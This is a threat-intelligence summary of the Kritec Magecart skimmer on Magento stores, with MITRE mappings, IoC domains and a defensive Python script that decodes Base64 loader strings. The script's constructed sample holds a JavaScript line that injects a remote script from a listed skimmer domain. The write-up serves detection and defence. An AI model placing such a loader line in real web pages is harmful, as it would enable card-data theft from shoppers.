New Kritec Magecart skimmer found on Magento stores

A new Magecart skimmer family named Kritec has been discovered on Magento stores, appearing alongside a separate skimming campaign and sharing indicators of compromise with older campaigns. Kritec loads its heavily obfuscated JavaScript through a Base64-encoded loader chain and exfiltrates stolen card data over WebSocket or HTTP POST; abuse of Google Tag Manager was observed in a related campaign. #Kritec #Magecart #GoogleTagManager #LCBO #Umbro

Keypoints

  • Kritec is a newly identified Magecart skimmer found on Magento stores, distinct from earlier WebSocket-based campaigns.
  • Some compromised stores loaded both Kritec and another skimmer at the same time, increasing the risk of repeated credit card data theft.
  • Kritec's loader starts from a Base64-encoded domain; the response it fetches is itself Base64-encoded and decodes to the URL of the actual skimming code.
  • The injected JavaScript is heavily obfuscated, likely using an obfuscator.io-style technique.
  • Data exfiltration methods vary: some instances use WebSocket for exfiltration, while others rely on HTTP POST requests.
  • Kritec and the Google Tag Manager abuse are tracked as separate campaigns; the operators hide their infrastructure behind Cloudflare. Malwarebytes protections cover its customers.

MITRE Techniques

  • [T1027] Obfuscated/Compressed Files and Information – The skimmer code is heavily obfuscated (likely via obfuscator.io). ‘The injected code … is heavily obfuscated (likely via obfuscator.io)’
  • [T1132] Data Encoding – The loader's first domain is Base64-encoded and the response it returns is Base64-encoded as well; decoding it reveals a URL pointing to the actual skimming code. ‘encoded in Base64’ and ‘Decoding it reveals a URL pointing to the actual skimming code’
  • [T1071] Web Protocols – Data exfiltration uses WebSocket and HTTP POST; the campaign exfiltrates stolen data via WebSocket or POST requests. ‘data exfiltration is done differently … WebSocket skimmer while … POST request’
  • [T1105] Ingress Tool Transfer – The loader fetches the actual skimming code from a remote URL after decoding the Base64 domain, indicating payload download from a remote source. ‘URL pointing to the actual skimming code’

Indicators of Compromise

  • [Domain] Kritec infrastructure – cloud-cdn.org, kritec.pics
  • [Domain] additional IOCs from Sucuri – ukatec.pics, gretit.yachts
  • [File name] script names – apex.min.js, elan-loader.js
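The T1132 behaviour described above (a Base64-encoded first domain, then a Base64-encoded response that decodes to the skimmer URL) lends itself to a simple triage check on a store's page scripts. The script below is an added example written for this summary, not code from Malwarebytes, Sucuri or the Kritec campaign: it decodes every Base64-looking literal in a script, matches the results against the IoC domains listed on this page, and decodes a first-stage response to extract the next-stage URL. The sample loader snippet and response body are constructed for the demonstration and are not the real Kritec code.

```python
"""Triage helper: surface Base64-encoded Kritec loader domains in page scripts."""
import base64
import binascii
import re
from typing import Optional

# Domains taken from the page's Indicators of Compromise section.
KRITEC_IOC_DOMAINS = ("cloud-cdn.org", "kritec.pics", "ukatec.pics", "gretit.yachts")

# Runs of Base64 alphabet characters (16+) with optional trailing padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_base64_literal(token: str) -> Optional[str]:
    """Decode one Base64 token to printable ASCII; None if it is not clean Base64 text."""
    padded = token + "=" * (-len(token) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def find_iocs(text: str, iocs=KRITEC_IOC_DOMAINS) -> list:
    """Return the IoC domains that occur as substrings of text, sorted."""
    return sorted(d for d in iocs if d in text)


def scan_script(script: str, iocs=KRITEC_IOC_DOMAINS) -> dict:
    """Decode every Base64-looking literal in a script and match the results against IoCs."""
    decoded = [d for d in (decode_base64_literal(t) for t in B64_TOKEN.findall(script)) if d]
    hits = sorted({d for s in decoded for d in find_iocs(s, iocs)})
    return {"decoded": decoded, "iocs": hits}


def decode_stage_response(body: str, iocs=KRITEC_IOC_DOMAINS) -> dict:
    """Decode the Base64 body returned by the first stage and pull out the next-stage URL."""
    url = decode_base64_literal(body.strip())
    if url is None or not url.startswith(("http://", "https://")):
        return {"url": None, "iocs": []}
    return {"url": url, "iocs": find_iocs(url, iocs)}


# Constructed sample (not real Kritec code): a loader hiding its first domain in Base64.
SAMPLE_ENCODED_DOMAIN = base64.b64encode(b"https://cloud-cdn.org").decode()
SAMPLE_SCRIPT = (
    "var s=document.createElement('script');\n"
    f"s.src=atob('{SAMPLE_ENCODED_DOMAIN}')+'/elan-loader.js';\n"
    "document.head.appendChild(s);\n"
)
# Constructed sample first-stage response: Base64 of the URL of the actual skimmer script.
SAMPLE_RESPONSE = base64.b64encode(b"https://kritec.pics/apex.min.js").decode()
# Constructed benign script with no Base64 literals, to show the check stays quiet.
BENIGN_SCRIPT = "window.dataLayer = window.dataLayer || []; dataLayer.push({event: 'pageview'});"

if __name__ == "__main__":
    print("loader scan:", scan_script(SAMPLE_SCRIPT))
    print("stage response:", decode_stage_response(SAMPLE_RESPONSE))
    print("benign scan:", scan_script(BENIGN_SCRIPT))
```

Run it against the inline scripts and external script bodies served by a checkout page; a decoded literal that resolves to one of the listed domains, or a response body that decodes to a URL ending in apex.min.js or elan-loader.js, is worth a closer look. The Base64 heuristic is deliberately simple and will miss loaders that split or re-encode the string, so treat it as a first pass, not a verdict.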

Read more: https://www.malwarebytes.com/blog/threat-intelligence/2023/03/new-kritec-skimmer